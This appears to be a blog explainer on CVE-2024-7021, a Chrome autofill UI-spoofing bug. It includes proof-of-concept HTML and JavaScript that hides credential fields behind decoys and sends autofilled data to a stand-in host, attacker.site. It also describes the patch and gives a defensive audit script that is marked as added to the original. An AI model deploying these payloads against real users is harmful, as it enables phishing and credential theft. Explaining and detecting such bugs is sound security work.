Chrome’s autofill is super convenient, but it can also open the door to bad actors when implemented wrong. That’s exactly what happened with CVE-2024-7021, a medium-severity bug that lurked in Google Chrome’s Windows version before 124.0.6367.60. In this long read, I’ll explain what happened, how it works, show real code snippets, and tell you how attackers could have abused it (so you know what to look out for).

1. What is CVE-2024-7021?

Let’s start simple. This bug boils down to Chrome not handling its autofill UI correctly. Through a specially made HTML page, an attacker could trick Chrome into showing autofill overlays (like saved passwords and addresses) in the wrong place, or at the wrong time. This could fool users into clicking something they didn’t mean to—or expose private information to a malicious site.

- Severity: Medium
- Fixed in: Google Chrome 124.0.6367.60

2. Official References

- Chromium Security Advisory (124.0.6367.60)
- CVE-2024-7021 entry on NVD
- Chromium Advisory Bugtracker *(may need Chromium access)*

3. How Did the Exploit Work?

The problem came from how Chrome managed autofill popups. The browser shows those little suggestion windows right below text fields. But the rendering and event handling for these popups can be manipulated.

Exploit Walkthrough

Scenario: An attacker wants to phish credentials and make their fake input boxes look real (and even get Chrome’s autofill suggestions to appear on top of them).

Basic HTML “Weaponized” Input

```html
<!DOCTYPE html>
<html>
<body>
  <form>
    <input id="user" autocomplete="username" placeholder="Username">
    <input id="pass" autocomplete="current-password" placeholder="Password">
    <input type="submit" value="Login">
  </form>
  <script>
    // Move the real username/password fields off-screen
    document.getElementById('user').style.position = 'absolute';
    document.getElementById('user').style.left = '-9999px';
    document.getElementById('pass').style.position = 'absolute';
    document.getElementById('pass').style.left = '-9999px';

    // Insert decoy fields for UI spoofing
    let fakeUser = document.createElement('input');
    fakeUser.placeholder = "Username";
    document.body.appendChild(fakeUser);

    // When the fake field is focused, quickly focus the real (offscreen) field
    fakeUser.onfocus = () => {
      document.getElementById('user').focus();
    }
  </script>
</body>
</html>
```

1. Decoy Input: The user sees a field that *looks* normal.
2. Event Hijack: When they click or tap it, JS instantly sends focus to the real field, which is hidden off-screen.
3. Chrome’s Autofill Responds: Chrome still sees the focus event on the official autocomplete="username" input. So it displays the *real* autofill popup over the fake field, not the real one.
4. Illusion: User thinks they're interacting safely. The attacker can now style the fake field, capture keystrokes, and present the real autofill overlay—making phishing much more convincing.

4. Payload Example: Stealing Autofill Data

Why is this dangerous? Because attackers can now present *real* Chrome autofill overlays above fake fields that send data directly to the attacker — not the legit website.

Extracting Username Example

```javascript
let fakeUser = document.createElement('input');
fakeUser.placeholder = "Username";
fakeUser.style.position = "absolute";
fakeUser.style.top = "100px";
fakeUser.style.left = "100px";
document.body.appendChild(fakeUser);

fakeUser.onfocus = () => {
  // Focus offscreen real field, which triggers Chrome's autofill UI
  let realUser = document.getElementById('user');
  realUser.focus();

  // Listen for autofill value being applied
  setTimeout(() => {
    fakeUser.value = realUser.value; // Steals autofilled data
    fetch('https://attacker.site/collect?data=' + encodeURIComponent(fakeUser.value));
  }, 500);
};
```

5. How Was It Fixed?

Chrome’s developers updated the internal logic so autofill popups are strictly anchored to *onscreen*, visible elements and ignore requests triggered by script-faked focus or layout misdirection. If the input isn’t really visible, autofill no longer responds. That blocks this style of UI spoof.

- Update Chrome: Always ensure Windows users run at least version 124.0.6367.60 or newer.
- User Awareness: Code like this can appear anywhere. Always double-check the address bar, and don’t trust autofill overlays if something feels “off” about a page’s look or location.
- Developers: Don’t style sensitive form fields to be invisible or move them offscreen; this can inadvertently allow other issues.
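
The visibility rule described in the fix section, and the developer advice above, can be expressed as a form audit. This is an added example, not Chrome's code and not from the original article; the snapshot shape, the token list, and the names `hiddenReasons` and `auditCredentialFields` are assumptions.

```javascript
// Added example: flags credential fields that autofill could target while the
// user cannot see them. Illustrative check only, not Chrome's implementation.
const SENSITIVE_TOKENS = new Set([ // assumed shortlist of autocomplete tokens
  'username', 'current-password', 'new-password', 'one-time-code', 'cc-number', 'cc-csc',
]);

// snapshot = { id, autocomplete, rect: {left, top, width, height},
//              style: {display, visibility, opacity} }, measured after the field
// took focus. In a browser, fill it from getBoundingClientRect() and
// getComputedStyle(); plain objects keep the logic testable outside a DOM.
function hiddenReasons(snapshot, viewport) {
  const { rect, style } = snapshot;
  const reasons = [];
  if (style.display === 'none') reasons.push('display:none');
  if (style.visibility === 'hidden') reasons.push('visibility:hidden');
  if (parseFloat(style.opacity) === 0) reasons.push('opacity:0');
  if (rect.width < 2 || rect.height < 2) reasons.push('near-zero size');
  const offscreen =
    rect.left + rect.width <= 0 || rect.top + rect.height <= 0 ||
    rect.left >= viewport.width || rect.top >= viewport.height;
  if (offscreen) reasons.push('outside viewport');
  return reasons;
}

function auditCredentialFields(snapshots, viewport) {
  return snapshots
    // autocomplete may hold several tokens, e.g. "section-login username"
    .filter((s) => (s.autocomplete || '').toLowerCase().split(/\s+/)
      .some((t) => SENSITIVE_TOKENS.has(t)))
    .map((s) => ({ id: s.id, reasons: hiddenReasons(s, viewport) }))
    .filter((f) => f.reasons.length > 0);
}

// Constructed sample mirroring the walkthrough: 'user' and 'pass' sit at
// left:-9999px, 'decoy' is the visible fake field, 'email' is a normal field.
const VIEWPORT = { width: 1280, height: 720 };
const shown = { display: 'inline-block', visibility: 'visible', opacity: '1' };
const SAMPLE = [
  { id: 'user', autocomplete: 'username', rect: { left: -9999, top: 8, width: 170, height: 21 }, style: shown },
  { id: 'pass', autocomplete: 'current-password', rect: { left: -9999, top: 8, width: 170, height: 21 }, style: shown },
  { id: 'decoy', autocomplete: '', rect: { left: 100, top: 100, width: 170, height: 21 }, style: shown },
  { id: 'email', autocomplete: 'section-login username', rect: { left: 8, top: 40, width: 170, height: 21 }, style: shown },
];

console.log(JSON.stringify(auditCredentialFields(SAMPLE, VIEWPORT)));
```

The decoy field is not reported because it carries no credential token; the signal is the pairing of a credential-tagged field with a position the user cannot see.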

7. Summary & Takeaway

CVE-2024-7021 is a reminder that little UI details can get seriously exploited. By not keeping a tight grip on autofill’s overlay logic, Chrome let bad actors blend real browser UI elements with their fake content, massively boosting phishing believability. Thanks to the patch, this window is closed—but keep your browser updated, and stay sharp!

*If you found this helpful, stay safe and keep on patching!*

Timeline

Published on: 11/14/2025 03:15:55 UTC
Last modified on: 11/17/2025 12:24:30 UTC